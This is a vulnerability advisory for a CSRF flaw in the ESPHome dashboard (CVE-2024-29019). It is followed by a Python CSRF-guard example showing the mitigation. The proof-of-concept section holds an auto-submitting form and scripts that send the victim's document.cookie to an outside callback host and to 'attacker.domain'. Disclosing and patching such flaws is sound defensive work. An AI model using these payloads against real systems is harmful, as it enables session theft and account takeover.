
CVE-2024-29019 esphome

Package

Manager: pip
Name: esphome
Vulnerable Version: >=2023.12.9 <2024.3.0

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00055 (percentile: 0.17068)

Details

ESPHome vulnerable to Authentication bypass via Cross site request forgery

### Summary

API endpoints in the dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF), allowing remote attackers to carry out attacks against a logged-in user of the dashboard to perform operations on configuration files (create, edit, delete).

### Details

A malicious actor can create a specifically crafted web page that triggers a cross-site request against ESPHome; this bypasses authentication for API calls on the platform.

### PoC

An example of a malicious web page that abuses this vulnerability:

```html
<html>
<body>
<form action="http://localhost:6052/edit?configuration=poc.yaml" id="#main" method="POST" enctype="text/plain" onsubmit="setTimeout(function () { window.location.reload(); }, 10)">
<input type="hidden" name="&lt;script&gt;&#13;&#10;fetch&#40;&apos;https&#58;&#47;&#47;907zv9yp9u3rjerkiakydpvcr3xulk99&#46;oastify&#46;com&#63;x" value="y&apos;&#44;&#32;&#123;&#13;&#10;method&#58;&#32;&apos;POST&apos;&#44;&#13;&#10;mode&#58;&#32;&apos;no&#45;cors&apos;&#44;&#13;&#10;body&#58;document&#46;cookie&#13;&#10;&#125;&#41;&#59;&#13;&#10;&lt;&#47;script&gt;&#13;&#10;" />
</form>
<script>
document.forms[0].submit();
</script>
<script>
</script>
</body>
</html>
```

Here the attacker creates and weaponizes a "poc.yaml" configuration file containing a cookie-exfiltration script, and the payload is triggered when the vulnerable page is visited. Example of such a script:

```html
<script>
fetch('https://attacker.domain', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
});
</script>
```

### Impact

This vulnerability allows bypassing authentication on API calls that access configuration file operations on behalf of a logged-in user. To trigger the vulnerability, the victim must visit a weaponized page.

In addition, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5 (as seen in the PoC) to obtain a complete takeover of the user account.
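The root cause described above is that the dashboard accepted state-changing requests on the strength of the browser-attached session cookie alone, which an auto-submitted form on any other site can exploit. The following is an added example of the standard mitigation, not ESPHome's code or its actual fix: a CSRF guard for a state-changing route that requires both an Origin/Referer matching the dashboard host and a per-session token the cross-site form cannot obtain or send. The header names, the `allowed_hosts` set, the HMAC-derived token scheme, and the sample requests are all assumptions constructed for the example.

```python
import hmac
import hashlib
from urllib.parse import urlsplit

# Methods that must never change state; the guard lets them through untouched.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def issue_csrf_token(session_secret: bytes, session_id: str) -> str:
    """Derive a per-session CSRF token (HMAC of the session id under a server secret).

    Hypothetical helper: the server embeds this token in its own pages and the
    front end echoes it back on every state-changing request.
    """
    return hmac.new(session_secret, session_id.encode(), hashlib.sha256).hexdigest()


def origin_allowed(headers: dict, allowed_hosts: set) -> bool:
    """Accept only requests whose Origin (or, failing that, Referer) is the dashboard itself.

    Browsers attach Origin to cross-site form POSTs and a page on another site
    cannot forge it; a request carrying neither header is rejected, not trusted.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    return urlsplit(source).netloc in allowed_hosts


def is_request_allowed(method: str, headers: dict, form: dict,
                       session_secret: bytes, session_id: str,
                       allowed_hosts: set) -> bool:
    """CSRF guard for a state-changing endpoint such as a config edit/delete route.

    A request passes only if the method is safe, or it comes from an allowed
    origin AND presents the session's CSRF token (as a header or a form field).
    """
    if method.upper() in SAFE_METHODS:
        return True
    if not origin_allowed(headers, allowed_hosts):
        return False
    presented = headers.get("X-CSRF-Token") or form.get("csrf_token")
    if not presented:
        return False
    expected = issue_csrf_token(session_secret, session_id)
    # Constant-time comparison so the check does not leak the token byte by byte.
    return hmac.compare_digest(presented, expected)


# Constructed sample values (not real traffic) modelled on the advisory's scenario.
SECRET = b"constructed-server-secret"
SESSION = "session-abc123"
DASHBOARD_HOSTS = {"localhost:6052"}


def demo() -> tuple:
    """Run the guard over a forged cross-site POST and a legitimate same-origin one."""
    # A form auto-submitted from an attacker-controlled page: the browser still sends
    # the victim's cookie, but Origin is the attacker's site and no token is present.
    forged = is_request_allowed(
        "POST",
        {"Origin": "http://attacker.example", "Cookie": "session=" + SESSION},
        {"payload": "text/plain-encoded body, ignored by the guard"},
        SECRET, SESSION, DASHBOARD_HOSTS,
    )
    # The dashboard's own front end, same origin, echoing the token in a header.
    legit = is_request_allowed(
        "POST",
        {"Origin": "http://localhost:6052",
         "X-CSRF-Token": issue_csrf_token(SECRET, SESSION)},
        {"configuration": "poc.yaml"},
        SECRET, SESSION, DASHBOARD_HOSTS,
    )
    return forged, legit


if __name__ == "__main__":
    print(demo())  # (False, True)
```

Two properties make the guard hold against the advisory's PoC: a plain HTML form (including one with `enctype="text/plain"`) cannot set custom headers or read a token that lives only in the dashboard's own pages, and the browser-supplied Origin of a form auto-submitted from another site is that site, not the dashboard. Marking the session cookie `SameSite=Lax` or `Strict` is a complementary browser-side control, but the server-side token check is what makes the route safe for clients that do not honour it.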

Metadata

Created: 2024-03-21T16:26:35Z
Modified: 2024-04-11T14:40:50Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-5925-88xh-6h99/GHSA-5925-88xh-6h99.json
CWE IDs: ["CWE-352"]
Alternative ID: GHSA-5925-88xh-6h99
Finding: F007
Auto approve: 1